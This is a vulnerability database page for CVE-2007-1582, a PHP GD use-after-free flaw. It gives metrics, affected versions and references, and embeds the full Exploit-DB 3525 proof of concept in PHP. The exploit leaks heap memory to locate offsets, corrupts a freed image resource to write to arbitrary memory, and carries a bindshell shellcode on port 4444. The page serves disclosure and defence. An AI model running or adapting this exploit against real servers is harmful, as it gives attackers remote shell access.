CVE-2007-1582 : Detail

CVE-2007-1582

1.17%V3
Network
2007-03-21
22h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The resource system in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allows context-dependent attackers to execute arbitrary code by interrupting certain functions in the GD (ext/gd) extension and unspecified other extensions via a userspace error handler, which can be used to destroy and modify internal resources.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3525

Publication date : 2007-03-19 23h00 +00:00
Author : Stefan Esser
EDB Verified : Yes

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP gd already freed resource usage exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // linux x86 bindshell on port 4444 from Metasploit $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65"; // Offsets used for the overwrite (will be overwritten by findOffsets() $offset_1 = 0x55555555; $offset_2 = 0x66666666; findOffsets(); // Comment out if you want to just test the crash class dummyclass { } function myErrorHandler() { imagedestroy($GLOBALS['img']); // Clipping $GLOBALS['x'] = str_repeat(chr(0), 7311); $GLOBALS['x'][7310] = chr(0x00); $GLOBALS['x'][7309] = chr(0x01); $GLOBALS['x'][7308] = chr(0x00); $GLOBALS['x'][7307] = chr(0x7f); $GLOBALS['x'][7306] = chr(0xff); $GLOBALS['x'][7305] = chr(0xff); $GLOBALS['x'][7304] = chr(0xff); $GLOBALS['x'][7303] = chr(0); $GLOBALS['x'][7302] = chr(0); $GLOBALS['x'][7301] = chr(0); $GLOBALS['x'][7300] = chr(0); $GLOBALS['x'][7299] = chr(0x80); $GLOBALS['x'][7298] = chr(0); $GLOBALS['x'][7297] = chr(0); $GLOBALS['x'][7296] = chr(0); // True Color Image $GLOBALS['x'][0x1c38] = chr(1); // True Color Pixelmap (1st entry must be 0) $GLOBALS['x'][0x1c3c] = chr(0x08); $GLOBALS['x'][0x1c3d] = chr(0x80); $GLOBALS['x'][0x1c3e] = chr(0x04); $GLOBALS['x'][0x1c3f] = chr(0x08); return true; } function poke($addr, $value) { $GLOBALS['img'] = imagecreate(1, 1); imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(), $value); } function peek($addr) { $GLOBALS['img'] = imagecreate(1, 1); return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass()); } printf("Using offsets %08x and %08x\n", $offset_1, $offset_2); error_reporting(E_ALL); set_error_handler("myErrorHandler"); poke($offset_2, $offset_1); unset($d); // This function uses the substr_compare() vulnerability // to get the offsets. function findOffsets() { global $offset_1, $offset_2, $shellcode; // We need to NOT clear these variables, // otherwise the heap is too segmented global $memdump, $d, $arr; $sizeofHashtable = 39; $maxlong = 0x7fffffff; // Signature of a big endian Hashtable of size 256 with 1 element $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; $memdump = str_repeat("A", 18192); for ($i=0; $i<400; $i++) { $d[$i]=array(); } unset($d[350]); $x = str_repeat("\x01", $sizeofHashtable); unset($d[351]); unset($d[352]); $arr = array(); for ($i=0; $i<129; $i++) { $arr[$i] = 1; } $arr[$shellcode] = 1; for ($i=0; $i<129; $i++) { unset($arr[$i]); } // If the libc memcmp leaks the information use it // otherwise we only get a case insensitive memdump $b = substr_compare(chr(65),chr(0),0,1,false) != 65; for ($i=0; $i<18192; $i++) { $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); if ($y-$Y == 1 || $Y-$y==1){ $y = chr($y); if ($b && strtoupper($y)!=$y) { if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { $y = strtoupper($y); } } $memdump[$i] = $y; } else { $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); if ($y-$Y != 1 && $Y-$y!=1){ $memdump[$i] = chr(1); } else { $memdump[$i] = chr(0); } } } // Search shellcode and hashtable and calculate memory address $pos_shellcode = strpos($memdump, $shellcode); $pos_hashtable = strpos($memdump, $search); if ($pos_shellcode == 0 || $pos_hashtable == 0) { die ("Unable to find offsets"); } $addr = substr($memdump, $pos_hashtable+6*4, 4); $addr = unpack("L", $addr); // Fill in both offsets $offset_1 = $addr[1] + 32; $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; } ?> # milw0rm.com [2007-03-20]

Products Mentioned

Configuraton 0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.4

    Php>>Php >> Version 4.0.5

    Php>>Php >> Version 4.0.6

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.1.0

    Php>>Php >> Version 4.1.1

    Php>>Php >> Version 4.1.2

    Php>>Php >> Version 4.2

      Php>>Php >> Version 4.2.0

      Php>>Php >> Version 4.2.1

      Php>>Php >> Version 4.2.2

      Php>>Php >> Version 4.2.3

      Php>>Php >> Version 4.3.0

      Php>>Php >> Version 4.3.1

      Php>>Php >> Version 4.3.2

      Php>>Php >> Version 4.3.3

      Php>>Php >> Version 4.3.4

      Php>>Php >> Version 4.3.5

      Php>>Php >> Version 4.3.6

      Php>>Php >> Version 4.3.7

      Php>>Php >> Version 4.3.8

      Php>>Php >> Version 4.3.9

      Php>>Php >> Version 4.3.10

      Php>>Php >> Version 4.3.11

      Php>>Php >> Version 4.4.0

      Php>>Php >> Version 4.4.1

      Php>>Php >> Version 4.4.2

      Php>>Php >> Version 4.4.3

      Php>>Php >> Version 4.4.4

      Php>>Php >> Version 4.4.5

      Php>>Php >> Version 4.4.6

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0

          Php>>Php >> Version 5.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.1

            Php>>Php >> Version 5.0.2

            Php>>Php >> Version 5.0.3

            Php>>Php >> Version 5.0.4

            Php>>Php >> Version 5.0.5

            Php>>Php >> Version 5.1.0

            Php>>Php >> Version 5.1.1

            Php>>Php >> Version 5.1.2

            Php>>Php >> Version 5.1.3

            Php>>Php >> Version 5.1.4

            Php>>Php >> Version 5.1.5

            Php>>Php >> Version 5.1.6

            Php>>Php >> Version 5.2.0

            Php>>Php >> Version 5.2.1

            References

            http://www.securityfocus.com/bid/23046
            Tags : vdb-entry, x_refsource_BID
            https://www.exploit-db.com/exploits/3525
            Tags : exploit, x_refsource_EXPLOIT-DB
            http://secunia.com/advisories/24542
            Tags : third-party-advisory, x_refsource_SECUNIA